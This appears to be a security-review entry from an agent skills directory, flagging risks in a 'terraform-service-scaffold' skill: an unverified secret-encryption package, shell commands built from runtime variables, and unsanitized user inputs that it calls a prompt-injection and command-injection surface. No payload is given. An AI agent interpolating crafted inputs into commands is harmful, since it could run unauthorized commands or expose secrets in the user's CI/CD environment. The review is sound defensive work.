The Agent Skills Directory

[EXTERNAL_DOWNLOADS]: The skill instructs the user and the agent to install and use git-secret-protector, an external Python package from an unverified third-party source (github.com/nicovince/git-secret-protector). Since this tool is used for encrypting and decrypting sensitive infrastructure secrets, any compromise of the package would lead to credential exposure.
[COMMAND_EXECUTION]: The skill generates local setup scripts and GitHub Actions workflows that execute shell commands (pip install, git-secret-protector init, terraform init). These commands are constructed using variables such as {project} and {service} which are provided by the user at runtime.
[PROMPT_INJECTION]: The skill lacks sanitization for user-provided inputs such as the service name and project identifier. These values are interpolated into shell commands, file paths, and Terraform configuration blocks without boundary markers or validation. This represents an indirect prompt injection surface where a crafted input could potentially result in command injection or unauthorized file access in the CI/CD environment or the local machine.

terraform-service-scaffold